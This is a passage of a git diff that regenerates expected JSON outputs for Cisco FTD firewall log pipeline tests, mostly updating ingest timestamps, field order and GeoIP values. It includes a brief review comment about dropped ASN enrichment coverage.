Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "index.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "index.cgi" + }, "@timestamp": "2019-08-14T14:02:11.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581735800Z", + "ingested": 
"2021-12-14T14:40:02.507021141Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581757800Z", + "ingested": "2021-12-14T14:40:02.507021531Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581763300Z", + "ingested": "2021-12-14T14:40:02.507021925Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": 
"" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581768600Z", + "ingested": "2021-12-14T14:40:02.507022360Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "priority": 2, - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "priority": 2, + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581774Z", + "ingested": "2021-12-14T14:40:02.507022748Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, 
@@ -1259,7 +1256,10 @@ "ftd": { "security": {} } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json index 6890093aabc..294b433c0c0 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json @@ -15,15 +15,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413139500Z", + "ingested": "2021-12-14T14:40:04.416568919Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", 
@@ -129,15 +129,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413148400Z", + "ingested": "2021-12-14T14:40:04.416572028Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -243,13 +243,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413154500Z", + "ingested": "2021-12-14T14:40:04.416572532Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -353,13 +353,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413158900Z", + "ingested": "2021-12-14T14:40:04.416572956Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json index afa0d5ae42a..4949fb372bb 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json 
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -17,13 +17,13 @@ "ip": "10.1.123.45" }, "message": "Intrusion attempt", - "tags": [ - "preserve_original_event" - ], "network": { "application": "webserver", "protocol": "http" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "beats", "product": "asa", @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:10.150747700Z", + "ingested": "2021-12-14T14:40:05.183238356Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:10.150757400Z", + "ingested": "2021-12-14T14:40:05.183241267Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:10.150763900Z", + "ingested": "2021-12-14T14:40:05.183241695Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:10.150770Z", + "ingested": "2021-12-14T14:40:05.183242107Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index e61077af9b2..e782bb3ba29 100644 
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.569363700Z", + "ingested": "2021-12-14T14:40:05.595628970Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.569371900Z", + "ingested": "2021-12-14T14:40:05.595631635Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.569377300Z", + "ingested": "2021-12-14T14:40:05.595632101Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", 
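Review bot: The regenerated expectation in test-not-ip.log-expected.json (hunk `@@ -7,20 +7,14 @@`) drops the whole `destination.as` object (`"number": 20712` and `organization.name`) for 81.2.69.144 together with the city/region change, so this pipeline test no longer asserts ASN enrichment for any event. That is most plausibly a side effect of the bundled GeoIP test database changing with the elastic-package bump rather than a pipeline regression, but nothing in the hunk distinguishes the two, and a pure coordinate refresh would have left the `as` block in place. It is worth confirming that the ASN enrichment step is still wired into the pipeline and, if the new test database simply has no ASN record for this address, adding a sample line whose destination still resolves an ASN so that `destination.as.number` keeps coverage, since detections commonly key on it. The remaining hunks in this file are only `event.ingested` timestamp refreshes.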
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index df048d88373..b2f590a92b6 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.982940200Z", + "ingested": "2021-12-14T14:40:06.019729035Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.982948100Z", + "ingested": "2021-12-14T14:40:06.019731519Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.982952400Z", + "ingested": "2021-12-14T14:40:06.019732027Z", "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982957300Z", + "ingested": "2021-12-14T14:40:06.019732429Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", 
@@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982961300Z", + "ingested": "2021-12-14T14:40:06.019732814Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982966100Z", + "ingested": "2021-12-14T14:40:06.019733194Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982970800Z", + "ingested": "2021-12-14T14:40:06.019733576Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982975200Z", + "ingested": "2021-12-14T14:40:06.019733966Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982979800Z", + "ingested": "2021-12-14T14:40:06.019734352Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", 
@@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982985400Z", + "ingested": "2021-12-14T14:40:06.019735496Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.982989800Z", + "ingested": "2021-12-14T14:40:06.019735914Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:35:10.982994800Z", + "ingested": "2021-12-14T14:40:06.019736497Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:35:10.983000700Z", + "ingested": "2021-12-14T14:40:06.019736882Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983041400Z", + "ingested": "2021-12-14T14:40:06.019737292Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", 
@@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983045400Z", + "ingested": "2021-12-14T14:40:06.019737677Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983049400Z", + "ingested": "2021-12-14T14:40:06.019738074Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983053600Z", + "ingested": "2021-12-14T14:40:06.019738591Z", "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983057300Z", + "ingested": "2021-12-14T14:40:06.019738981Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983062Z", + "ingested": "2021-12-14T14:40:06.019739387Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983067500Z", + "ingested": "2021-12-14T14:40:06.019739771Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983071Z", + "ingested": "2021-12-14T14:40:06.019740167Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983075700Z", + "ingested": "2021-12-14T14:40:06.019740558Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983081Z", + "ingested": "2021-12-14T14:40:06.019740953Z", "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983085900Z", + "ingested": "2021-12-14T14:40:06.019741477Z", "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983089800Z", + "ingested": "2021-12-14T14:40:06.019741887Z", "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983094600Z", + "ingested": "2021-12-14T14:40:06.019742274Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983100300Z", + "ingested": "2021-12-14T14:40:06.019742658Z", "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983104800Z", + "ingested": "2021-12-14T14:40:06.019743045Z", "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983108400Z", + "ingested": "2021-12-14T14:40:06.019743432Z", "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", 
@@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983112900Z", + "ingested": "2021-12-14T14:40:06.019743814Z", "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983117Z", + "ingested": "2021-12-14T14:40:06.019744194Z", "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983121900Z", + "ingested": "2021-12-14T14:40:06.019744581Z", "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983127900Z", + "ingested": "2021-12-14T14:40:06.019745034Z", "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983133700Z", + "ingested": "2021-12-14T14:40:06.019745411Z", "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983139500Z", + "ingested": "2021-12-14T14:40:06.019745882Z", "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983145200Z", + "ingested": "2021-12-14T14:40:06.019746283Z", "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983150900Z", + "ingested": "2021-12-14T14:40:06.019746685Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983155200Z", + "ingested": "2021-12-14T14:40:06.019747073Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983158800Z", + "ingested": "2021-12-14T14:40:06.019747460Z", "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
